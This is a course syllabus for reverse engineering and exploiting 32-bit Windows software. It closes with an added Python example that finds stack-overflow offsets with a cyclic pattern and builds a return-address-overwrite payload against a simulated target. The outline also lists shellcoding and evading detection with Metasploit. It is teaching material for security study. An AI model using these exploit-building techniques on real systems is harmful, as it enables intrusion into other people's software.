This course will familiarize students with all aspects of reverse engineering (reversing) Windows 32-bit applications for the purpose of locating flaws and developing exploits. By the end of the course students will be able to understand, locate, and exploit the common classes of flaws in 32-bit Windows software, including but not limited to stack buffer overflows, heap overflows, format string flaws, section overflows, and kernel flaws. Along the way students will gain a better understanding of how 32-bit Windows applications work and will use a number of common reversing tools, including disassemblers and debuggers such as IDA Pro, and fuzzers. Students will also learn how to leverage Python and other scripting tools to automate the discovery and exploitation of software flaws.
A non-exhaustive list of topics to be covered includes:
- Getting started
  - Acquiring software
    - Virtualization
    - Debuggers
      - IDA Pro
      - Freeware Windows debuggers
    - Scripting tools
    - Decompilers
    - Fuzzers
  - Setting up your testing environment
- A little Assembly
  - Basics of 32-bit Intel Assembly
  - Calling conventions used by Windows
- Stack overflows
  - Theory
  - Locating
  - Calculating offsets
  - Payload delivery
  - Exploit techniques
  - Stack protectors
- Heap overflows
  - Theory
  - Locating
  - Payload delivery
  - Exploit techniques
- Format string flaws
  - Theory
  - Locating
  - Payload delivery
  - Exploit techniques
- Section overflows and kernel flaws
  - Theory
  - Locating
  - Payload delivery
  - Exploit techniques
- Automation
  - Automating flaw discovery
    - Python
    - Shell scripting
    - Fuzzers
- Shellcoding basics
  - Theory
  - Where to get shellcode
  - Writing your own shellcode
- Metasploit
  - Creating exploit modules
  - Avoiding detection
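To make two of the outline items concrete, "Calculating offsets" under Stack overflows and the Python item under Automation, here is an added example (not course material) of the standard cyclic-pattern technique for finding how many bytes sit between the start of an overflowed buffer and the saved return address. It builds a Metasploit-style `Aa0Aa1...` pattern, maps the value the debugger shows in EIP at the crash back to a byte offset, and then assembles a payload that overwrites the return address. Because a real vulnerable target cannot be shipped in a syllabus, `simulate_overflow` is a constructed stand-in that models a frame of `[buffer][saved EBP][return address]`; the return address `0x10101010` is a hypothetical placeholder for whatever `jmp esp` style address you would pick in the real target.

```python
import string
import struct

# Added example, not part of the course material: a Metasploit-style cyclic
# pattern for locating the offset to the saved return address in a stack
# overflow, plus a simulated overflow so it can be run without a real target.

PATTERN_MAX = 26 * 26 * 10 * 3  # 20280 bytes, after which the triplets repeat


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the pattern Aa0Aa1Aa2...Zz9.

    Every 3-byte triplet (upper, lower, digit) is unique, so any 4-byte
    window of the pattern occurs exactly once within the first 20280 bytes.
    """
    if length > PATTERN_MAX:
        raise ValueError(f"pattern longer than {PATTERN_MAX} bytes is not unique")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # defensive; the loop above always returns first


def pattern_offset(pattern: bytes, crash_value: int, width: int = 4) -> int:
    """Map a register value seen at the crash (e.g. EIP = 0x33634132) back to
    its byte offset in the pattern.

    x86 is little-endian, so the pattern bytes that were popped into EIP appear
    reversed when the debugger prints the register; packing the value
    little-endian restores the original byte order before searching.
    """
    fmt = {4: "<I", 8: "<Q"}[width]
    needle = struct.pack(fmt, crash_value)
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError(f"{crash_value:#x} ({needle!r}) not found in pattern")
    return offset


def simulate_overflow(payload: bytes, buf_size: int):
    """Stand-in for a vulnerable target (constructed for this example only).

    Models a frame laid out as [buf_size bytes][saved EBP][return address]
    being overwritten by an unbounded copy of `payload`. Returns the value the
    CPU would load into EIP on `ret`, or None if the copy was too short to
    reach the return address.
    """
    ret_off = buf_size + 4  # skip the local buffer and the 4-byte saved EBP
    if len(payload) < ret_off + 4:
        return None
    return struct.unpack("<I", payload[ret_off:ret_off + 4])[0]


def build_payload(offset: int, ret_addr: int, shellcode: bytes) -> bytes:
    """Pad up to the return address, overwrite it, and append the shellcode.

    After `ret`, ESP points just past the overwritten return address, i.e. at
    the shellcode, which is why a `jmp esp` address is the usual choice.
    """
    return b"A" * offset + struct.pack("<I", ret_addr) + shellcode


if __name__ == "__main__":
    pattern = pattern_create(200)
    crash_eip = simulate_overflow(pattern, 64)  # what the debugger would show
    offset = pattern_offset(pattern, crash_eip)
    print(f"EIP={crash_eip:#010x} -> return address at offset {offset}")
    # 0x10101010 is a hypothetical address standing in for a real jmp esp.
    payload = build_payload(offset, 0x10101010, b"\xcc" * 8)
    print(f"controlled EIP: {simulate_overflow(payload, 64):#010x}")
```

Against a real target the workflow is the same: send `pattern_create(n)` for an `n` comfortably larger than the suspected buffer, read EIP from the debugger at the access violation, and feed that value to `pattern_offset`. If the value is not found, either the crash did not come from the return address (check ESP, the SEH chain and the other registers) or the copy mangled the pattern (a bad character such as a NUL or newline), which is the cue to move on to the "Payload delivery" material.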